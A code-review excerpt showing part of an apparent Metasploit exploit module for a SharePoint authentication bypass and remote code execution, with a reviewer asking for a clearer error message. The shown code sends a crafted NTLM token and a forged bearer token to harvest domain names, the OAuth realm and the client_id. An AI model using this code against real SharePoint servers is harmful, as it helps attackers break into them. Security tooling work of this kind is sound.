modules/exploits/windows/http/sharepoint_dynamic_proxy_generator_auth_bypass_rce.rb

```diff
@@ -0,0 +1,372 @@
+  end
+
+  def decode_string(byte_string)
+    byte_string.gsub(/\x00/, '')
+  end
+
+  def parse_ntlm_msg(msg)
+    target_info_fields = msg[40, 8]
+    target_info_len = decode_int(target_info_fields[0, 2])
+    target_info_offset = decode_int(target_info_fields[4, 4])
+    target_info_bytes = msg[target_info_offset, target_info_len]
+
+    target_info = {}
+
+    info_offset = 0
+
+    while info_offset < target_info_bytes.length
+      av_id = decode_int(target_info_bytes[info_offset, 2])
+      av_len = decode_int(target_info_bytes[info_offset + 2, 2])
+      av_value = target_info_bytes[info_offset + 4, av_len]
+      info_offset += 4 + av_len
+
+      case av_id
+      when MSV_AV_EOL
+        # Do nothing
+      when MSV_AV_NP_COMPUTER_NAME
+        target_info['MSV_AV_NP_COMPUTER_NAME'] = decode_string(av_value)
+      when MSV_AV_NP_DOMAIN_NAME
+        target_info['MSV_AV_NP_DOMAIN_NAME'] = decode_string(av_value)
+      when MSV_AV_DNS_COMPUTER_NAME
+        target_info['MSV_AV_DNS_COMPUTER_NAME'] = decode_string(av_value)
+      when MSV_AV_DNS_DOMAIN_NAME
+        target_info['MSV_AV_DNS_DOMAIN_NAME'] = decode_string(av_value)
+      end
+    end
+
+    target_info
+  end
+
+  def resolve_target_info
+    vprint_status('resolving tagret info')
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, '_api', 'web'),
+      'method' => 'GET',
+      'headers' => {
+        'Authorization' => 'NTLM TlRMTVNTUAABAAAAA7IIAAYABgAkAAAABAAEACAAAABIT1NURE9NQUlO',
+        'HOST' => datastore['HOSTNAME']
+      }
+    })
+    if res && res.headers['WWW-Authenticate']
+      auth_header = res.headers['WWW-Authenticate']
+      if auth_header.include?('NTLM')
+        msg2 = Rex::Text.decode_base64(auth_header.split('NTLM ')[1])
+        return parse_ntlm_msg(msg2)
+      else
+        raise InvalidResponse, 'The WWW-Authenticate header did not contain "NTLM"'
+      end
+    else
+      raise InvalidResponse, 'The server did not return a WWW-Authenticate header'
+    end
+  end
+
+  def get_oauth_info
+    vprint_status('getting oauth info')
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, '_api', 'web'),
+      'method' => 'GET',
+      'headers' => {
+        'Authorization' => 'Bearer eyJhbGciOiJIUzI1NiJ9.eyJuYmYiOiIxNjczNDEwMzM0IiwiZXhwIjoiMTY5MzQxMDMzNCJ9.YWFh',
+        'HOST' => datastore['HOSTNAME']
+      }
+    })
+    if res && res.headers['WWW-Authenticate']
+      raise InvalidResponse, 'The server did not return a WWW-Authenticate header containing a realm and client_id' unless res.headers['WWW-Authenticate'] =~ /NTLM, Bearer realm="(.+)",client_id="(.+)",trusted_issuers="/
+
+      realm = Regexp.last_match(1)
+      client_id = Regexp.last_match(2)
+      print_status("realm: #{realm}, client_id: #{client_id}")
+      return realm, client_id
+    else
+      raise InvalidResponse, 'The server did not return a WWW-Authenticate header'
```

Comment:
```suggestion
      raise InvalidResponse, 'The server did not return a WWW-Authenticate header with getting OAuth info'
```

since this message is also present in `resolve_target_info`, using a different one makes debugging a bit easier.